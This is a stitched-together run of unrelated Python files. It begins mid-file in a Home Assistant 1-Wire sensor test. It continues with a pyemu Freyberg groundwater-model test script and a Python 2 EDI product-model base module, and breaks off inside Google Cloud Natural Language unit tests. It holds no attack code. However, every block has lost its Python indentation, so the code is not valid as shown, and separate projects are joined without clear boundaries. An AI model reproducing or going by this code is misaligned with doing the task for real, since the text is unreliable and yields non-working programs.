"injected_value": b" 248125",
"result": "248125",
"unit": "count",
},
]
},
"22.111111111111": {
"sensors": [
{
"entity_id": "sensor.22_111111111111_temperature",
"unique_id": "/22.111111111111/temperature",
"injected_value": ProtocolError,
"result": "unknown",
"unit": TEMP_CELSIUS,
},
]
},
"28.111111111111": {
"sensors": [
{
"entity_id": "sensor.28_111111111111_temperature",
"unique_id": "/28.111111111111/temperature",
"injected_value": b" 26.984",
"result": "27.0",
"unit": TEMP_CELSIUS,
},
]
},
"3B.111111111111": {
"sensors": [
{
"entity_id": "sensor.3b_111111111111_temperature",
"unique_id": "/3B.111111111111/temperature",
"injected_value": b" 28.243",
"result": "28.2",
"unit": TEMP_CELSIUS,
},
]
},
"42.111111111111": {
"sensors": [
{
"entity_id": "sensor.42_111111111111_temperature",
"unique_id": "/42.111111111111/temperature",
"injected_value": b" 29.123",
"result": "29.1",
"unit": TEMP_CELSIUS,
},
]
},
"EF.111111111111": {
"inject_reads": [
b"HobbyBoards_EF", # read type
],
"sensors": [
{
"entity_id": "sensor.ef_111111111111_humidity",
"unique_id": "/EF.111111111111/humidity/humidity_corrected",
"injected_value": b" 67.745",
"result": "67.7",
"unit": PERCENTAGE,
},
{
"entity_id": "sensor.ef_111111111111_humidity_raw",
"unique_id": "/EF.111111111111/humidity/humidity_raw",
"injected_value": b" 65.541",
"result": "65.5",
"unit": PERCENTAGE,
},
{
"entity_id": "sensor.ef_111111111111_temperature",
"unique_id": "/EF.111111111111/humidity/temperature",
"injected_value": b" 25.123",
"result": "25.1",
"unit": TEMP_CELSIUS,
},
],
},
"EF.111111111112": {
"inject_reads": [
b"HB_MOISTURE_METER", # read type
b" 1", # read is_leaf_0
b" 1", # read is_leaf_1
b" 0", # read is_leaf_2
b" 0", # read is_leaf_3
],
"sensors": [
{
"entity_id": "sensor.ef_111111111112_wetness_0",
"unique_id": "/EF.111111111112/moisture/sensor.0",
"injected_value": b" 41.745",
"result": "41.7",
"unit": PERCENTAGE,
},
{
"entity_id": "sensor.ef_111111111112_wetness_1",
"unique_id": "/EF.111111111112/moisture/sensor.1",
"injected_value": b" 42.541",
"result": "42.5",
"unit": PERCENTAGE,
},
{
"entity_id": "sensor.ef_111111111112_moisture_2",
"unique_id": "/EF.111111111112/moisture/sensor.2",
"injected_value": b" 43.123",
"result": "43.1",
"unit": PRESSURE_CBAR,
},
{
"entity_id": "sensor.ef_111111111112_moisture_3",
"unique_id": "/EF.111111111112/moisture/sensor.3",
"injected_value": b" 44.123",
"result": "44.1",
"unit": PRESSURE_CBAR,
},
],
},
}
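# The mocked owproxy in the test below serves reads in this order: the two-character
# family code of the device, then any device-specific "inject_reads", then one
# injected value per expected sensor.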
@pytest.mark.parametrize("device_id", MOCK_DEVICE_SENSORS.keys())
async def test_owserver_setup_valid_device(hass, device_id):
"""Test for 1-Wire device."""
entity_registry = mock_registry(hass)
dir_return_value = [f"/{device_id}/"]
read_side_effect = [device_id[0:2].encode()]
if "inject_reads" in MOCK_DEVICE_SENSORS[device_id]:
read_side_effect += MOCK_DEVICE_SENSORS[device_id]["inject_reads"]
expected_sensors = MOCK_DEVICE_SENSORS[device_id]["sensors"]
for expected_sensor in expected_sensors:
read_side_effect.append(expected_sensor["injected_value"])
with patch("homeassistant.components.onewire.sensor.protocol.proxy") as owproxy:
owproxy.return_value.dir.return_value = dir_return_value
owproxy.return_value.read.side_effect = read_side_effect
assert await async_setup_component(hass, SENSOR_DOMAIN, MOCK_CONFIG)
await hass.async_block_till_done()
assert len(entity_registry.entities) == len(expected_sensors)
for expected_sensor in expected_sensors:
entity_id = expected_sensor["entity_id"]
registry_entry = entity_registry.entities.get(entity_id)
assert registry_entry is not None
assert registry_entry.unique_id == expected_sensor["unique_id"]
assert registry_entry.unit_of_measurement == expected_sensor["unit"]
state = hass.states.get(entity_id)
assert state.state == expected_sensor["result"]
|
|
import os
import platform
ext = ''
local_bins = False  # set to True to test with local binary exes
if local_bins:
bin_path = os.path.join("..", "..", "bin")
if "linux" in platform.platform().lower():
pass
bin_path = os.path.join(bin_path, "linux")
elif "darwin" in platform.platform().lower() or 'macos' in platform.platform().lower():
pass
bin_path = os.path.join(bin_path, "mac")
else:
bin_path = os.path.join(bin_path, "win")
ext = '.exe'
else:
bin_path = ''
if "windows" in platform.platform().lower():
ext = '.exe'
mf_exe_name = os.path.join(bin_path,"mfnwt")
pp_exe_name = os.path.join(bin_path, "pestpp-glm")
ies_exe_name = os.path.join(bin_path, "pestpp-ies")
swp_exe_name = os.path.join(bin_path, "pestpp-swp")
# for f in [mf_exe_name,pp_exe_name,ies_exe_name]:
# if not os.path.exists(f):
# raise Exception("{0} not found",f)
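# freyberg_test builds a PstFromFlopyModel interface around the Freyberg MODFLOW-NWT
# example, runs a noptmax=0 pestpp-glm check, re-bases the observation values on the
# model outputs, reruns to confirm phi is ~0, and finishes with a 10-realization
# pestpp-ies run via start_workers, asserting that mean phi decreases after one iteration.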
def freyberg_test():
import shutil
import numpy as np
import pandas as pd
try:
import flopy
except Exception as e:
return
import pyemu
org_model_ws = os.path.join("..", "examples", "freyberg_sfr_update")
nam_file = "freyberg.nam"
m = flopy.modflow.Modflow.load(nam_file, model_ws=org_model_ws, check=False,forgive=False,
exe_name=mf_exe_name)
setattr(m,"sr",pyemu.helpers.SpatialReference(delc=m.dis.delc.array,delr=m.dis.delr.array))
org_model_ws = "temp"
m.change_model_ws(org_model_ws)
m.write_input()
print("{0} {1}".format(mf_exe_name,m.name+".nam"),org_model_ws)
pyemu.os_utils.run("{0} {1}".format(mf_exe_name,m.name+".nam"),cwd=org_model_ws)
hds_file = "freyberg.hds"
list_file = "freyberg.list"
for f in [hds_file, list_file]:
assert os.path.exists(os.path.join(org_model_ws, f))
new_model_ws = "template1"
props = [["upw.hk",None],["upw.vka",None],["upw.ss",None],["rch.rech",None]]
hds_kperk = [[kper,0] for kper in range(m.nper)]
temp_bc_props = [["wel.flux",kper] for kper in range(m.nper)]
spat_bc_props= [["wel.flux",2]]
ph = pyemu.helpers.PstFromFlopyModel(m,new_model_ws,org_model_ws,
const_props=props,
zone_props=props,
kl_props=props,
pp_props=props,
grid_props=props,
hds_kperk=hds_kperk,
sfr_pars=True,sfr_obs=True,
spatial_bc_props=spat_bc_props,
temporal_bc_props=temp_bc_props,
remove_existing=True,
model_exe_name="mfnwt")
# tmp = mf_exe_name.split(os.sep)
# tmp = os.path.join(*tmp[1:])+ext
# assert os.path.exists(tmp),tmp
# shutil.copy2(tmp,os.path.join(new_model_ws,"mfnwt"+ext))
ph.pst.control_data.noptmax = 0
ph.pst.write(os.path.join(new_model_ws,"test.pst"))
print("{0} {1}".format(pp_exe_name,"test.pst"), new_model_ws)
pyemu.os_utils.run("{0} {1}".format(pp_exe_name,"test.pst"),cwd=new_model_ws)
for ext in ["rec",'rei',"par"]:
assert os.path.exists(os.path.join(new_model_ws,"test.{0}".format(ext))),ext
ph.pst.parrep(os.path.join(new_model_ws,"test.par"))
res = pyemu.pst_utils.read_resfile(os.path.join(new_model_ws,"test.rei"))
ph.pst.observation_data.loc[res.name,"obsval"] = res.modelled
ph.pst.write(os.path.join(new_model_ws,"test.pst"))
print("{0} {1}".format(pp_exe_name, "test.pst"), new_model_ws)
pyemu.os_utils.run("{0} {1}".format(pp_exe_name,"test.pst"),cwd=new_model_ws)
for ext in ["rec",'rei',"par","iobj"]:
assert os.path.exists(os.path.join(new_model_ws,"test.{0}".format(ext))),ext
df = pd.read_csv(os.path.join(new_model_ws,"test.iobj"))
assert df.total_phi.iloc[0] < 1.0e-10
pe = ph.draw(10)
pe.to_csv(os.path.join(new_model_ws,"par_en.csv"))
ph.pst.pestpp_options["ies_par_en"] = "par_en.csv"
ph.pst.control_data.noptmax = 1
ph.pst.write(os.path.join(new_model_ws, "test.pst"))
master_dir = "test_master"
pyemu.os_utils.start_workers(new_model_ws,ies_exe_name,"test.pst",
num_workers=10,worker_root='.',
master_dir=master_dir,silent_master=False)
df = pd.read_csv(os.path.join(master_dir,"test.phi.meas.csv"),index_col=0)
init_phi = df.loc[0,"mean"]
final_phi = df.loc[1,"mean"]
assert final_phi < init_phi
def fake_run_test():
import os
import numpy as np
import pyemu
new_model_ws = "template1"
if not os.path.exists(new_model_ws):
freyberg_test()
pst = pyemu.Pst(os.path.join(new_model_ws,"freyberg.pst"))
pst.pestpp_options["ies_num_reals"] = 10
pst.pestpp_options["ies_par_en"] = "par_en.csv"
pst.control_data.noptmax = 0
#pst = pyemu.helpers.setup_fake_forward_run(pst,"fake.pst",org_cwd=new_model_ws)
#pyemu.os_utils.run("{0} {1}".format(pp_exe_name,"fake.pst"),cwd=new_model_ws)
#pyemu.os_utils.run("{0} {1}".format(ies_exe_name, "fake.pst"), cwd=new_model_ws)
new_cwd = "fake_test"
pst = pyemu.helpers.setup_fake_forward_run(pst, "fake.pst", org_cwd=new_model_ws,new_cwd=new_cwd)
s = pst.process_output_files(new_cwd)
if s is not None:
assert s.dropna().shape[0] == pst.nobs
obs = pst.observation_data
diff = (100 * (obs.obsval - s.obsval) / obs.obsval).apply(np.abs)
print(diff)
print(obs.loc[diff>0.0,"obsval"],s.loc[diff>0.0,"obsval"])
assert diff.sum() < 1.0e-3,diff.sum()
pyemu.os_utils.run("{0} {1}".format(ies_exe_name, "fake.pst"), cwd=new_cwd)
def freyberg_kl_pp_compare():
import shutil
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
try:
import flopy
except Exception as e:
return
import pyemu
org_model_ws_base = os.path.join("..", "examples", "freyberg_sfr_update")
nam_file = "freyberg.nam"
m = flopy.modflow.Modflow.load(nam_file, model_ws=org_model_ws_base, check=False, forgive=False,
exe_name=mf_exe_name)
org_model_ws = "temp"
m.change_model_ws(org_model_ws)
m.write_input()
print("{0} {1}".format(mf_exe_name, m.name + ".nam"), org_model_ws)
pyemu.os_utils.run("{0} {1}".format(mf_exe_name, m.name + ".nam"), cwd=org_model_ws)
hds_file = "freyberg.hds"
list_file = "freyberg.list"
for f in [hds_file, list_file]:
assert os.path.exists(os.path.join(org_model_ws, f))
new_model_ws = "template1"
props = [["upw.hk", None]]
hds_kperk = [[kper, 0] for kper in range(m.nper)]
temp_bc_props = [["wel.flux", kper] for kper in range(m.nper)]
spat_bc_props = [["wel.flux", 2]]
ph = pyemu.helpers.PstFromFlopyModel(nam_file, new_model_ws, org_model_ws,
kl_props=props,
kl_num_eig=66,
pp_props=props,
pp_space=3,
hds_kperk=hds_kperk,
sfr_obs=True,
remove_existing=True,
model_exe_name="mfnwt")
obs = ph.pst.observation_data
hds_obs = obs.loc[obs.obgnme=="hds",:].copy()
hds_obs.loc[:, "i"] = hds_obs.obsnme.apply(lambda x: int(x.split('_')[2]))
hds_obs.loc[:, "j"] = hds_obs.obsnme.apply(lambda x: int(x.split('_')[3]))
hds_obs.loc[:,'ij'] = hds_obs.apply(lambda x: "{0:02d}{1:02d}".format(x.i,x.j),axis=1)
hds_obs.loc[:, "kper"] = hds_obs.obsnme.apply(lambda x: int(x.split('_')[4]))
hds_obs = hds_obs.loc[hds_obs.kper==hds_obs.kper.max(),:]
obs.loc[:,"weight"] = 0.0
obs_locs = pd.read_csv(os.path.join(org_model_ws_base,"obs_loc.csv"))
obs_locs.loc[:,"ij"] = obs_locs.apply(lambda x: "{0:02d}{1:02d}".format(x.row-1,x.col-1),axis=1)
print(obs_locs)
print(hds_obs.i.max(),hds_obs.j.max())
print(hds_obs.head())
hds_nz_obs = hds_obs.loc[hds_obs.ij.apply(lambda x: x in obs_locs.ij.values),"obsnme"]
print(hds_nz_obs)
obs.loc[hds_nz_obs,"weight"] = 1.0
obs.loc[hds_nz_obs,"obsval"] += np.random.normal(0.0,1.0,len(hds_nz_obs))
ph.pst.control_data.noptmax = 6
ph.pst.parameter_data.loc[ph.pst.parameter_data.pargp!="pp_hk0","partrans"] = "fixed"
ph.pst.write(os.path.join(new_model_ws,"pest_pp.pst"))
ph.pst.parameter_data.loc[:,"partrans"] = "log"
ph.pst.parameter_data.loc[ph.pst.parameter_data.pargp == "pp_hk0", "partrans"] = "fixed"
ph.pst.write(os.path.join(new_model_ws, "pest_kl.pst"))
pyemu.os_utils.start_workers(new_model_ws,"pestpp-ies","pest_pp.pst", num_workers=10,worker_root='.',
master_dir="pest_pp")
def freyberg_diff_obs_test():
import shutil
import numpy as np
import pandas as pd
try:
import flopy
except Exception as e:
return
import pyemu
oorg_model_ws = os.path.join("..", "examples", "freyberg_sfr_update")
nam_file = "freyberg.nam"
m = flopy.modflow.Modflow.load(nam_file, model_ws=oorg_model_ws, check=False,forgive=False,
exe_name=mf_exe_name)
org_model_ws = "temp"
m.change_model_ws(org_model_ws)
m.write_input()
print("{0} {1}".format(mf_exe_name,m.name+".nam"),org_model_ws)
pyemu.os_utils.run("{0} {1}".format(mf_exe_name,m.name+".nam"),cwd=org_model_ws)
hds_file = "freyberg.hds"
list_file = "freyberg.list"
for f in [hds_file, list_file]:
assert os.path.exists(os.path.join(org_model_ws, f))
new_model_ws = "template_diff_obs"
props = [["upw.hk",None]]
hds_kperk = [[0,k] for k in range(m.nlay)]
ph = pyemu.helpers.PstFromFlopyModel(nam_file,new_model_ws,org_model_ws,
const_props=props,
hds_kperk=hds_kperk,
sfr_pars=True,sfr_obs=True,
remove_existing=True,
model_exe_name="mfnwt")
obs_locs = pd.read_csv(os.path.join(oorg_model_ws,"obs_loc.csv"))
obs_locs.loc[:, "i"] = obs_locs.pop("row") - 1
obs_locs.loc[:, "j"] = obs_locs.pop("col") - 1
obs_locs.loc[:,"site"] = obs_locs.apply(lambda x: "trgw_{0:03d}_{1:03d}".format(x.i,x.j),axis=1)
kij_dict = {site: (2, i, j) for site, i, j in zip(obs_locs.site, obs_locs.i, obs_locs.j)}
binary_file = os.path.join(ph.m.model_ws, nam_file.replace(".nam", ".hds"))
frun_line, tr_hds_df = pyemu.gw_utils.setup_hds_timeseries(binary_file, kij_dict=kij_dict, include_path=True,
model=ph.m)
ph.frun_post_lines.append(frun_line)
ins_file = os.path.join(ph.m.model_ws,nam_file.replace(".nam", ".hds_timeseries.processed.ins"))
df = ph.pst.add_observations(ins_file,pst_path=".")
obs = ph.pst.observation_data
obs.loc[df.index, "obgnme"] = df.index.map(lambda x: "_".join(x.split("_")[:-1]))
obs.loc[df.index, "weight"] = 1.0
#trgw_groups = obs.loc[df.index, "obgnme"].unique()
#obs.loc[obs.obgnme.apply(lambda x: x in trgw_groups[::2]),"weight"] = 0.0
#obs.loc[ph.pst.nnz_obs_names[::2],"weight"] = 0.0
frun_line, tr_hds_diff_df = pyemu.helpers.setup_temporal_diff_obs(ph.pst, ins_file, include_path=True,
prefix="hdif")
ph.frun_post_lines.append(frun_line)
ins_file = os.path.join(ph.m.model_ws, nam_file.replace(".nam", ".hds_timeseries.processed.diff.processed.ins"))
df = ph.pst.add_observations(ins_file, pst_path=".")
obs = ph.pst.observation_data
obs.loc[df.index, "obgnme"] = df.index.map(lambda x: "_".join(x.split("_")[:-1]))
obs.loc[tr_hds_diff_df.index, "weight"] = tr_hds_diff_df.weight
obs.loc[tr_hds_diff_df.index, "obgnme"] = tr_hds_diff_df.obgnme
ins_file = os.path.join(ph.m.model_ws,nam_file.replace(".nam",".sfr.out.processed.ins"))
frun_line,tr_hds_diff_df = pyemu.helpers.setup_temporal_diff_obs(ph.pst,ins_file,include_path=True,
prefix="sfrdif")
ph.frun_post_lines.append(frun_line)
ins_file = os.path.join(ph.m.model_ws, nam_file.replace(".nam", ".sfr.out.processed.diff.processed.ins"))
df = ph.pst.add_observations(ins_file, pst_path=".")
obs = ph.pst.observation_data
obs.loc[df.index, "obgnme"] = df.index.map(lambda x: "_".join(x.split("_")[:-1]))
obs.loc[tr_hds_diff_df.index, "weight"] = tr_hds_diff_df.weight
obs.loc[tr_hds_diff_df.index, "obgnme"] = tr_hds_diff_df.obgnme
ph.write_forward_run()
# tmp = mf_exe_name.split(os.sep)
# tmp = os.path.join(*tmp[1:])+ext
# assert os.path.exists(tmp),tmp
# shutil.copy2(tmp,os.path.join(new_model_ws,"mfnwt"+ext))
ph.pst.control_data.noptmax = 0
ph.pst.write(os.path.join(new_model_ws,"test.pst"))
print("{0} {1}".format(pp_exe_name,"test.pst"), new_model_ws)
pyemu.os_utils.run("{0} {1}".format(pp_exe_name,"test.pst"),cwd=new_model_ws)
for ext in ["rec",'rei',"par"]:
assert os.path.exists(os.path.join(new_model_ws,"test.{0}".format(ext))),ext
pst = pyemu.Pst(os.path.join(new_model_ws,"test.pst"))
print(pst.phi)
assert pst.phi < 1.0e-6,pst.phi
if __name__ == "__main__":
#freyberg_diff_obs_test()
freyberg_test()
#freyberg_kl_pp_compare()
#import shapefile
#run_sweep_test()
#fake_run_test()
|
|
# The MIT License (MIT)
#
# Copyright (c) 2014 Max Holtzberg <mh@uvc.de>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import decimal
from lxml import etree
import re
import sys
import urllib2
class Field(object):
def __init__(self, *args, **kwargs):
self._default = kwargs.get('default', None)
self._args = args
self._kwargs = kwargs
def parse(self, rec):
for prefix in [''] + rec._prefixes:
for path in self._args:
node = rec._data.find(prefix + path, namespaces=rec._namespaces)
if node is not None:
return self._convert(node)
return self._default
class Bool(Field):
_neg = False
def _convert(self, node):
if 'equals' in self._kwargs:
res = self._kwargs['equals'] == node.text
else:
res = bool(node.text)
return res ^ self._neg
def __invert__(self):
self._neg = True
return self
class String(Field):
def __init__(self, *args, **kwargs):
super(String, self).__init__(*args, **kwargs)
if 'subst' in kwargs:
exp, self._sub = kwargs['subst']
self._exp = re.compile(exp)
else:
self._exp = None
def _convert(self, node):
if self._exp is None:
return unicode(node.text)
else:
return self._exp.sub(self._sub, node.text)
class Integer(Field):
def _convert(self, node):
return int(node.text)
class Decimal(Field):
def _convert(self, node):
return decimal.Decimal('%.2f' % decimal.Decimal(
node.text.replace(',', '.')))
class URL(Field):
def _convert(self, node):
return buffer(urllib2.urlopen(node.text).read())
class One2Many(Field):
def parse(self, rec):
for path in self._args:
items = rec._data.xpath(path, namespaces=rec._namespaces)
if len(items) > 0:
return self._convert(items)
if self._default is None:
return []
return self._default
def _convert(self, items):
return map(self._kwargs['model'], items)
class Many2One(Field):
def parse(self, rec):
if len(self._args) <= 0:
return self._convert(rec._data)
return super(Many2One, self).parse(rec)
def _convert(self, node):
return self._kwargs['model'](node)
class Attribute(Field):
def _convert(self, node):
return node.get(self._kwargs['attr'])
class Model(object):
_namespaces = {}
_prefixes = []
valid = Bool(default=False)
def __init__(self, data, context=None):
if isinstance(data, etree._Element):
self._data = data
self._ctx = context
else:
self._load(data)
def _load(self, data):
# Fill instance from data, maybe a primary key
raise NotImplementedError()
def __getattribute__(self, name):
attr = super(Model, self).__getattribute__(name)
if isinstance(attr, Field):
return attr.parse(self)
return attr
@classmethod
def copy(cls, context):
Class = type(cls.__name__, cls.__bases__, dict(cls.__dict__))
Class._ctx = context
return Class
@classmethod
def search(cls, keywords, offset=0, limit=20, count=False):
raise NotImplementedError()
@classmethod
def read(cls, codes):
raise NotImplementedError()
@classmethod
def create(cls, records):
raise NotImplementedError()
@classmethod
def update(cls, records):
raise NotImplementedError()
class ProductBase(Model):
name = Field()
description = Field()
code = Field()
replacement = Field()
ean13 = Field()
list_price = Field()
cost_price = Field()
picture = Field()
manufacturer = Field()
@property
def availability(self):
return None
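# Illustrative (hypothetical) backend usage: a concrete integration would subclass the
# models above and map XPath expressions to fields, e.g.
#     class Product(ProductBase):
#         _namespaces = {'p': 'http://example.com/catalog'}
#         name = String('p:Name')
#         list_price = Decimal('p:ListPrice')
# Attribute access on an instance then goes through Model.__getattribute__, which calls
# Field.parse() against the wrapped lxml element. The namespace and paths shown here are
# examples only, not part of any real schema.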
class OrderBase(Model):
orderid = Field()
lines = Field()
class EDIException(Exception):
@property
def code(self):
return self._code
@property
def message(self):
return self._msg
def __str__(self):
return repr(self._msg)
class ContextBase(object):
def __init__(self, url, userid, passwd, log=False):
self._url = url
self._userid = userid
self._passwd = passwd
self._log = log
def log(self, info, msg):
if self._log:
frame = sys._getframe(1)
cls = frame.f_locals.get('self', False)
cls = cls.__class__.__name__ + '.' if cls else ''
print '[ @%s%s (%s) ]' % (cls, frame.f_code.co_name, info)
print msg + '\n'
def get(self, clsname):
raise NotImplementedError()
def connect(self):
raise NotImplementedError()
def get_product(self, code):
raise NotImplementedError()
def check(self):
raise NotImplementedError()
|
|
# Copyright 2016 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
ANNOTATE_NAME = 'Moon'
ANNOTATE_CONTENT = 'A cow jumped over the %s.' % (ANNOTATE_NAME,)
ANNOTATE_SCORE = 1
ANNOTATE_MAGNITUDE = 0.2
ANNOTATE_SALIENCE = 0.11793101
ANNOTATE_WIKI_URL = 'http://en.wikipedia.org/wiki/Natural_satellite'
def _make_token_json(name, part_of_speech, head, edge_label):
token_dict = {
'text': {
'content': name,
'beginOffset': -1,
},
'partOfSpeech': {
'aspect': 'ASPECT_UNKNOWN',
'reciprocity': 'RECIPROCITY_UNKNOWN',
'case': 'NOMINATIVE',
'mood': 'MOOD_UNKNOWN',
'tag': part_of_speech,
'person': 'FIRST',
'number': 'SINGULAR',
'tense': 'TENSE_UNKNOWN',
'form': 'FORM_UNKNOWN',
'proper': 'PROPER_UNKNOWN',
'voice': 'VOICE_UNKNOWN',
'gender': 'GENDER_UNKNOWN',
},
'dependencyEdge': {
'headTokenIndex': head,
'label': edge_label,
},
'lemma': name,
}
return token_dict
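# For example, _make_token_json('cow', 'NOUN', 2, 'NSUBJ') yields a token dict whose
# text.content and lemma are 'cow', whose partOfSpeech.tag is 'NOUN', and whose
# dependencyEdge has headTokenIndex=2 and label='NSUBJ'.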
def _get_token_and_sentences(include_syntax):
from google.cloud.language.syntax import PartOfSpeech
if include_syntax:
token_info = [
('A', PartOfSpeech.DETERMINER, 1, 'DET'),
('cow', PartOfSpeech.NOUN, 2, 'NSUBJ'),
('jumped', PartOfSpeech.VERB, 2, 'ROOT'),
('over', PartOfSpeech.ADPOSITION, 2, 'PREP'),
('the', PartOfSpeech.DETERMINER, 5, 'DET'),
(ANNOTATE_NAME, PartOfSpeech.NOUN, 3, 'POBJ'),
('.', PartOfSpeech.PUNCTUATION, 2, 'P'),
]
sentences = [
{
'text': {
'content': ANNOTATE_CONTENT,
'beginOffset': -1,
},
},
]
else:
token_info = []
sentences = []
return token_info, sentences
def _get_entities(include_entities):
from google.cloud.language.entity import EntityType
if include_entities:
entities = [
{
'name': ANNOTATE_NAME,
'type': EntityType.LOCATION,
'metadata': {
'wikipedia_url': ANNOTATE_WIKI_URL,
},
'salience': ANNOTATE_SALIENCE,
'mentions': [
{
'text': {
'content': ANNOTATE_NAME,
'beginOffset': -1
},
'type': 'TYPE_UNKNOWN',
}
]
},
]
else:
entities = []
return entities
def make_mock_client(response, api_version='v1'):
import mock
from google.cloud.language.client import Client
connection = mock.Mock(spec=Client._CONNECTION_CLASSES[api_version])
connection.API_VERSION = api_version
connection.api_request.return_value = response
return mock.Mock(_connection=connection, spec=Client)
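# The mock client returns the canned ``response`` from connection.api_request; the tests
# below then verify the outgoing payload with api_request.assert_called_once_with().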
class TestEncoding(unittest.TestCase):
def test_default_low_maxunicode(self):
import sys
import mock
from google.cloud.language.document import Encoding
with mock.patch.dict(sys.__dict__, maxunicode=65535):
self.assertEqual(Encoding.get_default(), Encoding.UTF16)
with mock.patch.dict(sys.__dict__, maxunicode=1114111):
self.assertEqual(Encoding.get_default(), Encoding.UTF32)
class TestDocument(unittest.TestCase):
@staticmethod
def _get_target_class():
from google.cloud.language.document import Document
return Document
def _make_one(self, *args, **kw):
return self._get_target_class()(*args, **kw)
def test_constructor_defaults(self):
import google.cloud.language.document as MUT
client = object()
content = 'abc'
document = self._make_one(client, content)
self.assertIs(document.client, client)
self.assertEqual(document.content, content)
self.assertIsNone(document.gcs_url)
self.assertIsNone(document.language)
self.assertEqual(document.doc_type, MUT.Document.PLAIN_TEXT)
self.assertEqual(document.encoding, MUT.Encoding.get_default())
def test_constructor_explicit(self):
import google.cloud.language.document as MUT
client = object()
gcs_url = 'gs://some-bucket/some-obj.html'
language = 'ja'
document = self._make_one(client, gcs_url=gcs_url,
doc_type=MUT.Document.HTML,
language=language,
encoding=MUT.Encoding.UTF32)
self.assertIs(document.client, client)
self.assertIsNone(document.content)
self.assertEqual(document.gcs_url, gcs_url)
self.assertEqual(document.doc_type, MUT.Document.HTML)
self.assertEqual(document.language, language)
self.assertEqual(document.encoding, MUT.Encoding.UTF32)
def test_constructor_explicit_language(self):
client = object()
content = 'abc'
document = self._make_one(client, content, language='en-US')
self.assertEqual(document.language, 'en-US')
self.assertEqual(document._to_dict()['language'], 'en-US')
def test_constructor_no_text(self):
with self.assertRaises(ValueError):
self._make_one(None, content=None, gcs_url=None)
def test_constructor_text_and_gcs(self):
with self.assertRaises(ValueError):
self._make_one(None, content='abc',
gcs_url='gs://some-bucket/some-obj.txt')
def test__to_dict_with_content(self):
klass = self._get_target_class()
content = 'Hello World'
document = self._make_one(None, content=content)
info = document._to_dict()
self.assertEqual(info, {
'content': content,
'type': klass.PLAIN_TEXT,
})
def test__to_dict_with_gcs(self):
klass = self._get_target_class()
gcs_url = 'gs://some-bucket/some-obj.html'
document = self._make_one(None, gcs_url=gcs_url)
info = document._to_dict()
self.assertEqual(info, {
'gcsContentUri': gcs_url,
'type': klass.PLAIN_TEXT,
})
def test__to_dict_with_no_content(self):
klass = self._get_target_class()
document = self._make_one(None, content='')
document.content = None # Manually unset the content.
info = document._to_dict()
self.assertEqual(info, {
'type': klass.PLAIN_TEXT,
})
def _verify_entity(self, entity, name, entity_type, wiki_url, salience,
sentiment=None):
from google.cloud.language.entity import Entity
self.assertIsInstance(entity, Entity)
self.assertEqual(entity.name, name)
self.assertEqual(entity.entity_type, entity_type)
if wiki_url:
self.assertEqual(entity.metadata, {'wikipedia_url': wiki_url})
else:
self.assertEqual(entity.metadata, {})
self.assertEqual(entity.salience, salience)
self.assertEqual(len(entity.mentions), 1)
self.assertEqual(entity.mentions[0].text.content, name)
if sentiment:
self.assertEqual(entity.sentiment.score, sentiment.score)
self.assertAlmostEqual(entity.sentiment.magnitude,
sentiment.magnitude)
@staticmethod
def _expected_data(content, encoding_type=None,
extract_sentiment=False,
extract_entities=False,
extract_syntax=False):
from google.cloud.language.document import Document
expected = {
'document': {
'type': Document.PLAIN_TEXT,
'content': content,
},
}
if encoding_type is not None:
expected['encodingType'] = encoding_type
if extract_sentiment:
features = expected.setdefault('features', {})
features['extractDocumentSentiment'] = True
if extract_entities:
features = expected.setdefault('features', {})
features['extractEntities'] = True
if extract_syntax:
features = expected.setdefault('features', {})
features['extractSyntax'] = True
return expected
def test_analyze_entities(self):
from google.cloud.language.document import Encoding
from google.cloud.language.entity import EntityType
name1 = 'R-O-C-K'
name2 = 'USA'
content = name1 + ' in the ' + name2
wiki2 = 'http://en.wikipedia.org/wiki/United_States'
salience1 = 0.91391456
salience2 = 0.086085409
response = {
'entities': [
{
'name': name1,
'type': EntityType.OTHER,
'metadata': {},
'salience': salience1,
'mentions': [
{
'text': {
'content': name1,
'beginOffset': -1
},
'type': 'TYPE_UNKNOWN',
}
]
},
{
'name': name2,
'type': EntityType.LOCATION,
'metadata': {'wikipedia_url': wiki2},
'salience': salience2,
'mentions': [
{
'text': {
'content': name2,
'beginOffset': -1,
},
'type': 'PROPER',
},
],
},
],
'language': 'en-US',
}
client = make_mock_client(response)
document = self._make_one(client, content)
entity_response = document.analyze_entities()
self.assertEqual(len(entity_response.entities), 2)
entity1 = entity_response.entities[0]
self._verify_entity(entity1, name1, EntityType.OTHER,
None, salience1)
entity2 = entity_response.entities[1]
self._verify_entity(entity2, name2, EntityType.LOCATION,
wiki2, salience2)
# Verify the request.
expected = self._expected_data(
content, encoding_type=Encoding.get_default())
client._connection.api_request.assert_called_once_with(
path='analyzeEntities', method='POST', data=expected)
def test_analyze_entity_sentiment_v1_error(self):
client = make_mock_client({})
document = self._make_one(client, 'foo bar baz')
with self.assertRaises(NotImplementedError):
entity_response = document.analyze_entity_sentiment()
def test_analyze_entity_sentiment(self):
from google.cloud.language.document import Encoding
from google.cloud.language.entity import EntityType
from google.cloud.language.sentiment import Sentiment
name1 = 'R-O-C-K'
name2 = 'USA'
content = name1 + ' in the ' + name2
wiki2 = 'http://en.wikipedia.org/wiki/United_States'
salience1 = 0.91391456
